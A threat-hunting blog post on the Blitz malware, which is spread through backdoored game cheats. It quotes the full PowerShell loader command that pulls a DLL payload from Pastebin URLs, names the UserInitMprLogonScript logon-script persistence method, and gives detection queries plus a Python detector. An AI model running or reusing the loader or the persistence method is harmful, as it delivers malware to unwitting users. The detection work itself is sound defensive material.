159. Hunting for Backdoored Game Cheats
Hello everyone!
Malware distribution through game cheats isn't a new phenomenon, so it's important to be able to detect the related activity. Let's look into a fresh report by Unit42 on a new Windows-based malware family called Blitz.
The malware author used social media to distribute Blitz through game cheat packages. The threat actor abused PowerShell to deliver the Blitz downloader:
powershell.exe -c "$ProgressPreference = 'SilentlyContinue'; $p=\"$env:LOCALAPPDATA\Microsoft\Internet Explorer\ieapfltr.dll\"; $hu='https://pastebin.com/raw/FSzik5ew'; $du=(irm 'https://pastebin.com/raw/RzLEd17Z'); if (Test-Path $p) {$eh=irm $hu; if($eh.Length -eq 64 -and $eh -match '^[a-fA-F0-9]{64}$'){$ah=(Get-FileHash $p -Algorithm SHA256).Hash; if ($eh -ne $ah) {iwr $du -OutFile $p}}} else {iwr $du -OutFile $p}"
Walking through the command: it reads the expected SHA-256 hash of the payload from one Pastebin raw URL ($hu) and the download URL from another ($du). If ieapfltr.dll already exists under %LOCALAPPDATA%\Microsoft\Internet Explorer, it only re-downloads when the on-disk hash differs from the published one; otherwise it downloads right away. Two pastes are enough to give the operator a self-updating payload. Note that the loader uses both the iwr (Invoke-WebRequest) and irm (Invoke-RestMethod) aliases. Let's focus on Pastebin and iwr to build our hunting query:
event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("pastebin" AND "iwr")
One more thing: the persistence mechanism. Blitz persists through a Logon Script, which is far less common than Run keys or scheduled tasks, so it's a good idea to hunt for registry modifications related to the UserInitMprLogonScript value (it lives under HKCU\Environment):
event_type: "registryvaluesetwin"
AND
reg_key_path: "UserInitMprLogonScript"
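To see both hunts as executable logic, here is an added Python example (my own code, not from the post or from the Unit42 report) that runs the two rules over a handful of constructed events. It goes slightly beyond the queries above: it also matches the irm alias and the spelled-out Invoke-WebRequest / Invoke-RestMethod cmdlet names, and treats pwsh.exe as a PowerShell host as well. The flat event layout and the reg_value_data field are assumptions, and every sample event is constructed.

```python
import re

# Constructed sample telemetry (not taken from the Unit42 report), shaped like the
# event_type / proc_file_name / cmdline / reg_key_path fields of the hunting queries above.
# "reg_value_data" is an assumed field name. The Pastebin ID in event 0 is the one quoted
# on this page; "EXAMPLE" is a placeholder.
SAMPLE_EVENTS = [
    # 0: the Blitz loader command line (abridged)
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell.exe -c \"$du=(irm 'https://pastebin.com/raw/RzLEd17Z');"
                "iwr $du -OutFile $p\""},
    # 1: benign admin script, no Pastebin
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    # 2: constructed variant: pwsh.exe, full cmdlet names, mixed-case host name
    {"event_type": "processcreatewin", "proc_file_name": "pwsh.exe",
     "cmdline": "pwsh.exe -c \"Invoke-WebRequest (Invoke-RestMethod "
                "'https://PASTEBIN.com/raw/EXAMPLE') -OutFile x.dll\""},
    # 3: Logon Script persistence write
    {"event_type": "registryvaluesetwin",
     "reg_key_path": "HKCU\\Environment\\UserInitMprLogonScript",
     "reg_value_data": "C:\\Users\\victim\\AppData\\Local\\Temp\\loader.bat"},
    # 4: ordinary Run-key autostart, not what this hunt is after
    {"event_type": "registryvaluesetwin",
     "reg_key_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
     "reg_value_data": "C:\\Program Files\\Vendor\\updater.exe"},
]

POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}
PASTEBIN = re.compile(r"pastebin\.com", re.IGNORECASE)
# The page's query keys on the iwr alias; this widens it to the irm alias the loader
# also uses and to the spelled-out cmdlet names, so a trivial rewrite doesn't evade it.
WEB_FETCH = re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod)\b", re.IGNORECASE)


def is_pastebin_loader(event):
    """Process-creation rule: a PowerShell host fetching something from Pastebin."""
    if event.get("event_type") != "processcreatewin":
        return False
    if event.get("proc_file_name", "").lower() not in POWERSHELL_HOSTS:
        return False
    cmdline = event.get("cmdline", "")
    return bool(PASTEBIN.search(cmdline) and WEB_FETCH.search(cmdline))


def is_logon_script_persistence(event):
    """Registry rule: a write touching the UserInitMprLogonScript value (HKCU\\Environment)."""
    if event.get("event_type") != "registryvaluesetwin":
        return False
    return "userinitmprlogonscript" in event.get("reg_key_path", "").lower()


def hunt(events):
    """Run both rules over a list of events and return (rule_name, event_index) hits."""
    hits = []
    for index, event in enumerate(events):
        if is_pastebin_loader(event):
            hits.append(("pastebin_powershell_loader", index))
        if is_logon_script_persistence(event):
            hits.append(("userinit_logon_script", index))
    return hits


if __name__ == "__main__":
    for rule, index in hunt(SAMPLE_EVENTS):
        print(f"{rule}: event {index}: {SAMPLE_EVENTS[index]}")
```

If your telemetry schema stores the registry value name in a separate field rather than inside reg_key_path, match on that field instead; a quick look at a known-good logon-script write in your own data confirms which layout you have.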
See you tomorrow!